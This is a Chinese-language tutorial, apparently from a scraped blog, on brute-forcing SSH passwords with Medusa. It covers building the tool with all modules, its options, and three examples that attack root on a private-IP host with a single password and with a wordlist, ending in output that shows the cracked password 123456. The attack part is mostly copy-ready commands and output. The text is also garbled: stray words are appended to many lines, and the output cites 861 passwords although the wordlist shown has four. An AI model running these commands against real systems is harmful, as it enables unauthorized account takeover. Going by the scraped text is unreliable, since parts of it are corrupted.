使用Medusa美杜莎暴力破解SSH密码

使用Medusa美杜莎暴力破解SSH密码html


 

 

 

一、Medusa简介mysql

Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。能够同时对多个主机,用户或密码执行强力测试。Medusa和hydra同样,一样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。web

官方网站:http://foofus.net/goons/jmk/medusa/medusa.html。sql

 

二、安装medusa ,手动编译和安装medusavim

[root@k5 ~]# yum install libssh2-devel libssh2-devel  -y服务器

[root@k5 ~]# tar zxvf 2.2.tar.gzapp

[root@k5 ~]# cd medusa-2.2/ssh

[root@k5 medusa-2.2]# ./configure   --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes模块化

#这个参数中加入不少模块,这样方便后期使用。--enable-module-ssh=yes这个就是稍后要使用的暴力破解sshd服务的模块。svn

[root@k5 medusa-2.2]#make -j 4

[root@k5 medusa-2.2]# make install         #安装完成后,会将medusa的一些modules 文件复制到/usr/local/lib/medusa/modules文件夹。

[root@k5 ~]# ls /usr/local/lib/medusa/modules  #查看已经生成的模块

 

三、Medusa参数说明

Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]

-h [TEXT]      目标主机名称或者IP地址

-H [FILE]       包含目标主机名称或者IP地址文件

-u [TEXT]      测试的用户名

-U [FILE]       包含测试的用户名文件

-p [TEXT]      测试的密码

-P [FILE]       包含测试的密码文件

-C [FILE]       组合条目文件

-O [FILE]       日志信息文件

-e [n/s/ns]    n表明空密码,s表明为密码与用户名相同

-M [TEXT]      模块执行名称

-m [TEXT]      传递参数到模块

-d                 显示全部的模块名称

-n [NUM]       使用非默认Tcp端口

-s                 启用SSL

-r [NUM]       重试间隔时间,默认为3秒

-t [NUM]       设定线程数量

-T             同时测试的主机总数

-L                 并行化,每一个用户使用一个线程

-f                 在任何主机上找到第一个帐号/密码后,中止破解

-F                在任何主机上找到第一个有效的用户名/密码后中止审计。

-q                显示模块的使用信息

-v [NUM]      详细级别(0-6)

-w [NUM]     错误调试级别(0-10)

-V                显示版本

-Z [TEXT]      继续扫描上一次

 

四、破解单一服务器SSH密码

例1:经过文件来指定host和user,host.txt为目标主机名称或者IP地址,user.txt指定须要暴力破解的用户名,密码指定为123456。

[root@k5 medusa-2.2]# cd

[root@k5 ~]# echo 10.27.17.34 > /root/host.txt

[root@k5 ~]# echo root > /root/users.txt

[root@k5 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -p 123456

 

注:能够看到暴解成功。

 

例2:对单一服务器进行密码字典暴力破解

[root@k5 ~]# vim /root/p.txt       #写入如下内容,每行一个密码,作一个临时字典 。

123

abc123

123456

666666

注:其中123456 是咱们的密码

[root@k5 ~]# medusa -M ssh -H ./host.txt -U ./users.txt -P p.txt

 

例3:加-O  ssh.log 能够将成功破解的记录记录到ssh.log文件中

[root@k5 medusa-2.2]# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log

ACCOUNT CHECK: [ssh] Host: 10.27.17.34 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (2 of 861 complete)
ACCOUNT FOUND: [ssh] Host: 10.27.17.34 User: root Password: 123456 [SUCCESS]

[root@k5 ~]# cat ssh.log

# Medusa has finished (2019-09-19 11:13:37).# Medusa v.2.2 (2019-09-19 11:15:16)# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log # Medusa v.2.2 (2019-09-19 11:26:37)# medusa -M ssh -H /root/host.txt -U /root/users.txt -P /root/p.txt -O ./ssh.log ACCOUNT FOUND: [ssh] Host: 10.27.17.34 User: root Password: 123456 [SUCCESS]# Medusa has finished (2019-09-19 11:26:40).

相关文章
相关标签/搜索